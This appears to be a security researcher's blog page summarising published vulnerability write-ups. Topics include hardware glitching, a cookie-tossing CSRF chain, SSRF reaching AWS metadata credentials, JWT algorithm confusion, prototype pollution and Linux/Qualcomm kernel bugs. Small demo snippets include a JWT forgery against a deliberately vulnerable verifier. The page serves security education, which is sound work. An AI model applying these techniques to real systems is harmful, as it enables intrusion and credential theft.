Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Renesas'hack - 693

CollShade    Reference →Posted 4 Years Ago
  • The author was working with a device that had a Renesas RX65 chip on it and wanted to see the contents of its firmware. Alas, the chip had a programmer write lock on it: reading required a 16-byte ID code that they clearly did not have. Additionally, all of the protocols for communication were proprietary. That looks like a challenge if I've ever seen one!
  • Three interfaces for firmware operations appeared in the docs: USB, FINE and SCI. FINE is a proprietary Renesas interface and is not documented. USB is also not documented, so the serial interface would normally be the easiest option. However, the serial protocol had a limit on the number of ID codes and USB was not exposed on the device, so the best option was FINE.
  • By reading schematics and datasheets, the author found out that FINE is a single-wire interface. Using the Renesas Flash Programmer on a dev board allowed them to see the traffic being sent. Here's the problem though: this did not make it possible to tell the host and device communication apart.
  • In order to fix this problem, the author added a small resistor on the OCD side, forming a voltage divider. When the MCU pulls the line low, the voltage at the center point (measured with an ADC) is 0V. However, when the OCD pulls the line low, there is a small voltage (about 200mV) at the center point. This allowed the two directions of communication to be distinguished and the protocol to be reversed more easily.
  • Even with this amazing setup and some reversing, a friend of the author noted that the FINE protocol looked quite similar to the SCI protocol (which is well documented in the manual). There are some notes on the two protocols, but the author leaves the rest of this reversing for someone else to do.
  • How can the ID check be bypassed? Glitching! If we can change the path the running code takes by physically disturbing the device, then we can reach the programming mode. In this case, the goal was to glitch the power supply of the MCU right after sending the Serial Programming ID Code Check command over FINE.
  • To set this up properly, the author removed every capacitor on VCC to create a direct connection to the core power supply. This lets the voltage and current glitch actually reach the system instead of being smoothed out as usual. The glitching procedure looked like this:
    1. Run the FINE initialization sequence up to the ID Check.
    2. Send the ID Check command to the MCU. This is where the timer for the glitch starts.
    3. Glitch the system after a set delay.
    4. Try each delay 50 times. Increase the timer if this does not work.
  • After running this for a very long time, the programmer works and the Flash can be extracted! Glitching is extremely powerful but complicated to set up. The author submitted CVE-2021-43327 for this vulnerability on the chip as well. Interesting bypass, and it's really cool to see a real glitching setup.
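The search loop described above might look something like this sketch. The post shows no code, so every hardware-facing call is a stand-in, and the toy "target" at the bottom only exists to make the loop runnable:

```python
def find_glitch_delay(send_id_check, fire_glitch, programming_mode_open,
                      max_delay_ns=10_000, step_ns=10, tries_per_delay=50):
    """Sweep the delay after the ID Code Check command, firing the
    glitch and retrying each offset a fixed number of times."""
    for delay in range(0, max_delay_ns, step_ns):
        for _ in range(tries_per_delay):
            send_id_check()              # run the FINE init + send the command
            fire_glitch(delay)           # drop VCC this long after the command
            if programming_mode_open():  # success: the ID check was skipped
                return delay
    return None                          # widen the sweep and try again

# Toy simulation standing in for the real MCU: programming mode only
# opens when the glitch lands inside a narrow window.
state = {"delay": None}
send = lambda: state.update(delay=None)
glitch = lambda d: state.update(delay=d)
is_open = lambda: state["delay"] is not None and 4200 <= state["delay"] < 4210

print(find_glitch_delay(send, glitch, is_open))  # 4200
```

In practice the inner loop is where the hours go: the window is tiny, and the success check is just "did the programmer suddenly start answering".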

Jupyter Notebook Instance Takeover - 692

Gafnit Amiga - Lightspin    Reference →Posted 4 Years Ago
  • Amazon SageMaker is a fully managed machine learning service hosted on AWS. With SageMaker, data scientists and developers can quickly and easily build and train machine learning models, and then directly deploy them into a production-ready hosted environment.
  • While looking at the source code of the website via view-source:, they noticed an interesting file path being used for the environment. This directory, home/ec2-user/anaconda3/envs/JupyterSystemEnv/share/jupyter/lab/static, had several HTML, JavaScript and CSS files inside of it. By modifying an HTML page, the author trivially achieved XSS! But here is the thing: this was a self-XSS. What can we really do with that?
  • Since all instance domains are of the form <my_instance>.<region>.sagemaker.aws, the self-XSS could potentially be escalated beyond the hosted instance. They noticed that all of the cookies were scoped to the shared parent domain .sagemaker.aws! In particular, the anti-CSRF token was on this domain.
  • The author used an attack that I had never considered before: cookie tossing. An attacker on one subdomain sets a cookie scoped to the parent domain, so it gets sent along to sibling subdomains that use it for critical actions. With our XSS on our own instance's subdomain, we can do exactly that.
  • SageMaker used the double-submit CSRF protection. This works by sending the CSRF token in a cookie and a second copy as a header or a field in the request. Since an attacker cannot normally read or set the CSRF cookie, this works quite well. However, in this case, cookie tossing lets us set the CSRF token cookie ourselves! This means the double-submit method is compromised, since we control both values being sent.
  • There are a couple of other things to consider with CSRF though: origin validation, non-simple request issues and the SameSite cookie flag. The origin validation was non-existent, so this part was fine. In the land of browsers, CORS becomes a major problem for CSRF attacks because a pre-flight OPTIONS request is made for anything non-trivial. As a result, only certain types of requests, known as simple requests, can be used. This prevents us from setting custom headers, sending JSON and using any method other than GET/POST.
  • The application puts the CSRF token into a header. However, the author figured out that it could be passed as a GET parameter instead and the request would still work! One more problem though: the request being made was a JSON request. The trick was to set the Content-Type to text/plain, which keeps the request "simple" while the body is still parsed as JSON by the server! That's a new trick for me.
  • The final CSRF mitigation is the SameSite cookie flag. There are three settings: None, Lax and Strict. The default in Chrome and Firefox is Lax, but the default in Safari is None. Under Lax, some cross-site requests still send cookies, such as GET requests from top-level navigations. Strict never sends cookies on cross-site requests.
  • In Chrome, if the SameSite attribute is never set explicitly (so it defaults to Lax), there is a 2-minute grace period after a cookie is set during which cross-site requests will still include it. So, the author found a GET request (unaffected by SameSite under Lax) that resets the user's auth token! Since that cookie was then less than 2 minutes old, it was sent along with the forged request. Damn, that is a real fancy workaround!
  • With the CSRF protections defeated, an extension can be added to a notebook to execute code in it. From there, the access tokens for the instance's role can be stolen, leading to much more damage being caused.
  • I learned a few new tricks from this. First, cookie tossing makes sense and is a large weakness of the double-submit CSRF protection. Second, the text/plain simple-request trick and sending the CSRF value as a parameter. Finally, abusing the Chrome grace period on the SameSite cookie attribute to reset the auth token was really awesome. Overall, a crazy article about how a self-XSS led to a compromise.
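The double-submit weakness at the heart of this chain can be sketched in a few lines (the names here are illustrative, not SageMaker's actual implementation):

```python
def double_submit_ok(cookies: dict, params: dict) -> bool:
    # server-side check: the token in the cookie must match the copy
    # the client echoed back in the request (header or parameter)
    token = cookies.get("_xsrf")
    return token is not None and token == params.get("_xsrf")

# Normally an attacker can neither read nor set the victim's cookie,
# so they cannot make the two values match:
print(double_submit_ok({"_xsrf": "server-secret"}, {"_xsrf": "guess"}))  # False

# Cookie tossing: a cookie set from the attacker's subdomain, scoped to
# the shared parent domain, rides along to the victim's instance. The
# attacker now controls BOTH values, so the check passes:
print(double_submit_ok({"_xsrf": "tossed"}, {"_xsrf": "tossed"}))  # True
```

The check itself is fine; the broken assumption is that only the legitimate site can set cookies that the server will receive.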

URL whitelist bypass in https://cxl-services.appspot.com - 691

David Schutz    Reference →Posted 4 Years Ago
  • An internal GCP project called cxl-services is used to proxy internal requests for some other service; the author does not give a description of what it does at all.
  • The application has an allowlist for the domains that can be called internally using this service. When validating the URL, the parser falls for the '\@' trick, a parser differential that even RFC-faithful implementations disagree with real-world clients about.
  • The issue: for https://[your_domain]\@jobs.googleapis.com, the validator thinks the authority is jobs.googleapis.com, but the library making the request actually sends it to [your_domain] with a path of /@jobs.googleapis.com. The verification differing from the usage causes the vulnerability.
  • Why is this SSRF a problem? Most of the time, an SSRF gives the attacker access to an internal network. In this case, an authorization token for App Engine is attached to the request, and it is now leaked to us.
  • With the access token in hand, the author wanted to demonstrate impact without jeopardizing the company. They found a few other projects that the authorization token had access to (docai-demo, p-jobs, garage-stating, etc.). They took rigorous notes on the requests they made, in order to help Google with incident response.
  • The patch for the bug was pretty terrible: block '\' and '@' appearing next to each other. So, adding anything between them (such as the URL https://[your_domain]\_@jobs.googleapis.com) still caused the SSRF. After this was fixed, they found ANOTHER issue: old vulnerable versions of the App Engine app were still running and also needed to be patched.
  • Overall, an interesting bug and a trick that I did not know about! Keeping verification consistent with actual usage is hard to do properly. Additionally, lots of bugs are not fixed properly the first time!
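The parser differential is easy to demonstrate with Python's RFC-style urlsplit; the WHATWG behavior in the comment is how browsers and many HTTP clients treat the same string (attacker.example is a placeholder domain):

```python
from urllib.parse import urlsplit

url = "https://attacker.example\\@jobs.googleapis.com/"

# RFC 3986-style parsers treat everything before the last "@" in the
# authority as userinfo, so a validator sees the allowlisted host:
print(urlsplit(url).hostname)  # jobs.googleapis.com

# A WHATWG-style parser treats "\" like "/" in http(s) URLs, ending the
# authority early, so the request actually goes to attacker.example
# with a path of "/@jobs.googleapis.com/" -- validation and usage disagree.
```

Two parsers, one string, two different hosts: exactly the mismatch the allowlist bypass exploits.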

Authentication Bypass when using JWT w/ public keys - 690

Plokta - HackerOne    Reference →Posted 4 Years Ago
  • JSON Web Tokens (JWTs) are a common way to create session tokens. They contain three main parts: header, data and signature. The header is information about the token, the data is the important information about the user, and the signature is a cryptographic value demonstrating that the JWT has not been tampered with.
  • JWTs can use both asymmetric and symmetric algorithms for the signature. The asymmetric version, such as RSA, is commonly used because the public key can verify the signature without knowledge of the private key. This makes it possible for tokens to be verified by services other than the one that generated them!
  • The header is a base64-encoded JSON blob that contains several elements, but only one we are interested in: alg, the algorithm used for the signature. For instance, this could be set to RS256 for RSA or HS256 for HMAC.
  • So, if the user can specify the algorithm, which key is used? This is where the vulnerability occurs! If the algorithm set by the user is used without validation while the server expects an asymmetric algorithm, problems occur.
  • With RSA, the public key is used to verify the signature, so that is the key handed to the verifier. But if we select a symmetric algorithm, such as HMAC, that same key will be used as the secret key.
  • This is where the magic lies: the public key is public! By selecting a symmetric algorithm such as HMAC, we can sign the JWT with the public key. Since that key is the input to the signature validator, it will blindly treat the RSA public key as the HMAC secret. Now we can sign arbitrary tokens!
  • This is the issue that happened in Jitsi, an open-source product similar to Zoom. Looking at the Node.js jsonwebtoken library to see whether the same thing is possible there, it turns out that it is, if the application allows the algorithm to be set; otherwise, the algorithm is inferred from the type of the secret.
  • Interesting bug that probably exists in other places. JWTs are awesome but have many foot-guns inside of them.
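A minimal, standard-library-only sketch of the alg-confusion forgery: the verifier below is deliberately vulnerable, and the PEM string is a placeholder for the server's real public key:

```python
import base64, hashlib, hmac, json

def b64url(data: bytes) -> bytes:
    return base64.urlsafe_b64encode(data).rstrip(b"=")

def sign_hs256(secret: bytes, claims: dict) -> bytes:
    head = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url(json.dumps(claims).encode())
    sig = hmac.new(secret, head + b"." + body, hashlib.sha256).digest()
    return head + b"." + body + b"." + b64url(sig)

def vulnerable_verify(token: bytes, key: bytes) -> bool:
    # the flaw: trust the attacker-controlled alg header, and reuse the
    # same `key` (meant to be an RSA public key) as the HMAC secret
    head, body, sig = token.split(b".")
    padded = head + b"=" * (-len(head) % 4)
    if json.loads(base64.urlsafe_b64decode(padded))["alg"] == "HS256":
        good = hmac.new(key, head + b"." + body, hashlib.sha256).digest()
        return hmac.compare_digest(b64url(good), sig)
    raise NotImplementedError("RS256 verification omitted from this sketch")

# The public key is public, so the attacker can sign with it:
public_key_pem = b"-----BEGIN PUBLIC KEY-----...-----END PUBLIC KEY-----"
forged = sign_hs256(public_key_pem, {"user": "admin"})
print(vulnerable_verify(forged, public_key_pem))  # True
```

The fix is for the verifier to pin the expected algorithm (or key type) instead of reading it out of the attacker-supplied header.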

Stored XSS via Mermaid Prototype Pollution vulnerability - 689

Misha98857 - HackerOne    Reference →Posted 4 Years Ago
  • Prototype pollution is about poisoning a base JavaScript object to overwrite variables or functions that will then be inherited by other objects later. This vulnerability is in GitLab's integration of Mermaid, a diagramming library used in its markdown rendering.
  • When creating a diagram in Mermaid, JSON can be specified in the initialization directive. This JSON is then merged or copied in some way (the post does not say explicitly), which creates a prototype pollution vulnerability.
  • In order to exploit this, they specify a field called template containing JavaScript. Later on, this input gets executed when clicking on the search bar. XSS!
  • The author had found an additional prototype pollution in GitLab as well. In that article, they mention the cause: "Behind the scenes, library takes JSON_OBJECT from directive and merges it with config object. Later that config is used to generate new CSS rules..."
  • The fix is a denylist of attribute names containing __proto__ and a few other items. I hate this solution; if another way is found to reference the prototype, the vulnerability comes right back.

This shouldn't have happened: A vulnerability postmortem - 688

Tavis Ormandy - Project Zero (P0)    Reference →Posted 4 Years Ago
  • The author of this post found an extremely straightforward bug that had been around for quite some time! The first part of the article explains the bug, then the author dives into why it wasn't discovered earlier and how we can find these types of bugs in the future.
  • Network Security Services (NSS) is a cryptographic library that is maintained by Mozilla. When you verify an ASN.1 encoded digital signature, NSS will create a VFYContext structure to store the necessary data. This includes things like the public key, the hash algorithm, and the digital signature.
  • In this implementation, the RSA signature has a maximum size of 2048 bytes, i.e. 16384 bits. What happens if you use something bigger than this? Memory corruption! An attacker controls both the data and the size passed to a memcpy into a fixed-size buffer.
  • The bug is fairly straightforward: copying data into a fixed-size buffer without any sanity checks. The author then asks: how did this slip through the cracks? Mozilla does nightly fuzzing of this library, ASAN could have detected this easily, lots of people look over the code... so, what went wrong? The author has three points.
  • The author actually found the bug while experimenting with coverage methods other than block coverage. One was stack coverage, which monitors the stack during execution to find different paths. The other was object isolation, a way to randomly permute typed data.
  • First, the library is missing end-to-end testing. NSS is a modular library, and each component is fuzzed individually. For instance, QuickDER is tested ONLY by creating and deleting objects, never by actually using them. Since the buggy code only runs when verifying a signature, that fuzzer could never have caught it.
  • Another issue is that fuzzers typically cap themselves on the size of inputs in order to be faster and get coverage quicker. In the case of this library, the size cap was 10,000 bytes. However, these limits are arbitrary and may lead to missed findings, as lots of vulnerabilities occur at the extremes.
  • All of the NSS fuzzers are represented in combined coverage metrics by oss-fuzz instead of individual coverage. This data was misleading: the vulnerable code appeared to be fuzzed extensively, but only by fuzzers that could not possibly generate a relevant input, since their tests used hardcoded certificates.
  • Overall, the bug was really simple. The analysis of why such a simple bug lived so long in the code base was fascinating. To me, it means getting as much real coverage as possible and letting the randomization algorithms do their thing. Consider all of the possible cases where something could be used and ensure that the fuzzer can reach them.
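The bug class itself fits in a few lines. This sketch (constant and names are mine, not NSS's) shows the missing sanity check that made the oversized-signature copy fatal:

```python
MAX_RSA_SIG_BYTES = 2048  # the fixed buffer size from the post (16384-bit keys)

def store_signature(sig: bytes) -> bytearray:
    # the check that was missing: without it, an attacker-supplied
    # signature longer than the buffer overflows it during the copy
    if len(sig) > MAX_RSA_SIG_BYTES:
        raise ValueError("signature exceeds buffer")
    buf = bytearray(MAX_RSA_SIG_BYTES)
    buf[:len(sig)] = sig  # the memcpy equivalent, now safely bounded
    return buf
```

In C there is no bounds checking on the destination, so the same copy without the length check silently corrupts whatever sits after the VFYContext buffer.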

Discovering Full Read SSRF in Jamf - 687

Shubham Shah - AssetNote    Reference →Posted 4 Years Ago
  • Jamf is an application used by system administrators to configure and automate IT tasks. There are cloud (SaaS) and on-premise variations of the product. It is a popular MDM (mobile device management) solution for Apple products.
  • The authors were curious whether they could find any server-side request forgery (SSRF). To do this, they looked for HTTP clients used within Jamf. When building software, it is not uncommon to have an HTTP client wrapper that is used by the rest of the code base, which was the case here. Searching for this wrapper across the code base turned up a bunch of other occurrences.
  • By going from source to sink, they found all locations where user-controllable URLs were used to make HTTP calls; this led them to 6 usages in the code. One of them was functionality to test viewing an image from a distribution point, which takes a user-controlled URL and then displays the content back to the user.
  • The result of this request is an XML page that has the image base64 encoded. However, the data does not have to be an image; it will base64 encode anything that you request! This gives the attackers the ability to make a request on the internal network and view the result of it.
  • The cloud version of this software is hosted on AWS. SSRF in an application hosted on AWS can lead to the compromise of the instance by making an HTTP call to the metadata service. A simple GET request to an internal IP will return the temporary security credentials of the environment, assuming that a role has been attached to the instance. Using this, it may have been possible to escalate deeper into the account, but the team stopped investigating and reported the bug.
  • Jamf's monitoring team noticed this strange behavior, causing alarms to sound. They banned the IP address making the requests and disabled the instance where the exploit had been performed. As a temporary fix, they added a WAF rule to all instances that blocked this type of request from being made.
  • Overall, good article on an impactful SSRF vulnerability and exploitation.
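Extracting the internal response from the preview endpoint might look like this; the XML element names are my guesses for illustration, not Jamf's actual schema:

```python
import base64
import xml.etree.ElementTree as ET

def extract_ssrf_response(xml_text: str) -> bytes:
    # the endpoint base64-encodes whatever the fetched URL returned,
    # so decoding the field yields the raw internal response
    root = ET.fromstring(xml_text)
    return base64.b64decode(root.findtext("contents"))

# e.g. a response after pointing the "image" URL at the AWS metadata
# service, which hands back temporary credentials for the attached role
sample = "<response><contents>%s</contents></response>" % (
    base64.b64encode(b'{"AccessKeyId": "ASIA..."}').decode())
print(extract_ssrf_response(sample))
```

This is what makes it a *full-read* SSRF: the attacker does not just trigger a request, they get the complete response body back.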

Fall of the machines: Exploiting the Qualcomm NPU (neural processing unit) kernel driver - 686

Man Yue Mo - Github Security Labs    Reference →Posted 4 Years Ago
  • The NPU (neural processing unit) is a co-processor on Qualcomm chips that is designed for AI and machine learning tasks. The NPU has a kernel driver that can be interacted with from user space on Samsung devices. Since this is Linux, the code is open source!
  • To interact with the driver, the file /dev/msm_npu is used. This driver has many IOCTL calls, such as allocating/unmapping a DMA buffer, loading/unloading a neural network model and several other operations. Most of the commands are synchronous, with a few being asynchronous.
  • When loading an NPU model, a statically sized global array of contexts tracks the different jobs taking place. When npu_close is called, the client pointer is removed from the network.
  • Since this information is global, all information associated with old clients needs to be removed. By calling npu_close and the asynchronous npu_exec_network at close to the same time, the client is still used but never cleaned up! This leads to a use-after-free on a pointer in the global buffer. By replacing the client object with a fake object, arbitrary kernel functions can be called with one controlled parameter.
  • The next bug is very strange; it is as if the code was never tested for functionality. When calling npu_exec_network_v2, stats_buf can be specified to collect some debugging information. But this never worked: instead of the buffer address stored in the field, the address of the field itself was used! &kevt->reserved[0] should have been kevt->reserved[0].
  • The bug above leaks the address of stats_buf rather than copying its contents. This allowed the attacker to learn where this buffer sits in memory and partially defeat KASLR. What a silly bug, and yet it provides another step in the chain.
  • The author also noticed that an object was never being initialized and some of its values were not guaranteed to be set either. By itself, this may not lead to any interesting bugs. However, digging further, this object was being copied back to user space, making it a good option for an information leak.
  • struct npu_kevent contains a union with four potential members. In C, the compiler sizes a union to fit its largest member. The largest member (uint8_t data[128]) is an auxiliary buffer of 128 bytes. When the copy happens while a smaller union member is in use, such as struct msm_npu_event_execute_v2_done exec_v2_done, the rest of the data is never initialized.
  • Now, here is the best part: all of the bytes unused by the smaller member get copied over anyway! This is because the code uses sizeof(struct msm_npu_event), which accounts for the largest union member, as the copy size. So even though the used part of the union was initialized, the rest of the buffer was not. Damn, this is an awesome bug!
  • To bring this all together, the third vulnerability defeats KASLR and other randomness. The second bug reveals the address of stats_buf, which is important for crafting a fake object. The first vulnerability then uses the fake object, placed over the freed allocation, to call a function pointer and get code execution.
  • Once code execution was achieved, the author needed to bypass control flow integrity (CFI). The goal was to call __bpf_prog_run32 with a pointer to bytecode that should be executed in the kernel. Since the parameters were not set up properly, they needed a function that moves a controlled value into the second parameter. Moving from parameter 1 to parameter 2 was easy because of the abundance of small wrapper functions in Linux.
  • Overall, these were difficult-to-spot bugs, found through code review and happy accidents by somebody intentionally hunting for them. For me, if I see a union or global variables being shared, I'll make sure to check out that flow. Great article!
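The uninitialized-union copy can be reproduced in miniature with ctypes; the struct layout here is illustrative, not the driver's exact definition:

```python
import ctypes

class ExecV2Done(ctypes.Structure):
    # stand-in for the small union member actually being used
    _fields_ = [("network_hdl", ctypes.c_uint32),
                ("exec_result", ctypes.c_uint32)]

class KeventPayload(ctypes.Union):
    # the 128-byte member dictates sizeof() for the whole union
    _fields_ = [("exec_v2_done", ExecV2Done),
                ("data", ctypes.c_uint8 * 128)]

payload = KeventPayload()
# simulate stale heap contents left over from a previous allocation
ctypes.memset(ctypes.byref(payload), 0x41, ctypes.sizeof(payload))
# the code initializes only the small member it is using...
payload.exec_v2_done.network_hdl = 1
payload.exec_v2_done.exec_result = 0
# ...but copies sizeof(union) == 128 bytes back out
leaked = bytes(payload.data)
print(leaked[8:12])  # b'AAAA' -- stale bytes past the initialized fields
```

Only the first 8 bytes were initialized; the remaining 120 "reserved" bytes carry whatever was in memory before, which is exactly the kernel infoleak described above.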

Linux: UAF read: SO_PEERCRED and SO_PEERGROUPS race with listen() (and connect())- 685

Jann Horn    Reference →Posted 4 Years Ago
  • In Linux programming, sockets are how network connections are made and data is sent. Finding vulnerabilities in the network stack can be catastrophic, since they may be triggerable remotely with no user interaction.
  • When sock_getsockopt handles the option SO_PEERCRED, no lock is taken while copying the data to userspace. Why is this bad? Because of the missing lock, the object can be freed while it is still being read and then handed back to the user: a use-after-free.
  • The race can be triggered by calls that update sk->sk_peer_cred, because the creds are replaced and then freed. If another process/thread is accessing the structure at that moment, a use-after-free can occur.
  • The proof of concept reads the peer credentials of a listening socket over and over again in one thread. Then, in the other thread, it destroys the peer credentials object. If this is run with ASAN, a use-after-free crash occurs.
  • This vulnerability could only be used as an information disclosure for privilege escalation; no useful writes could occur. Overall, a straightforward missing lock on a variable access that leads to a really bad bug.

Full key extraction of NVIDIA TSEC- 684

plutooo    Reference →Posted 4 Years Ago
  • In 2018, the Nintendo Switch's security was in a bad place. The bootrom was vulnerable to an easy-to-exploit buffer overflow in the USB stack. Because of this, control flow could be hijacked and the DRM checks completely bypassed, and since this was in the bootrom, the security of the Switch was completely compromised.
  • How does one fix this? The AES root keys were stolen, meaning that all previous consoles were going to be compromised forever. The T210 chip (the main SoC) has a security processor (TSEC) that was not in use at the time. By moving to this processor, Nintendo fixed their secure boot and added new key material!
  • A CMOS transistor has an activation voltage of 0.6-0.7V. When the chip is not given the proper voltage, the transistors act in very funny ways. The main CPU communicates with the PMIC (power management IC) over i2c to set the voltage.
  • When the voltage drops below a certain point, the CPU starts to act in strange ways. The USB bootrom bug can be used to compromise the main CPU, and from there, messages can be sent over i2c to set the voltage.
  • This is the perfect setup for a differential fault attack (DFA). This involves causing glitches at exactly the right time in order to leak data from the system. In this case, AES-128 has 10 rounds. The idea with DFA is to ignore the first 8-9 rounds and focus only on the last 2. If you can get 1-2 bit flips in the last two rounds, you can solve for the key, which is pretty awesome! A reference to DFA can be found here.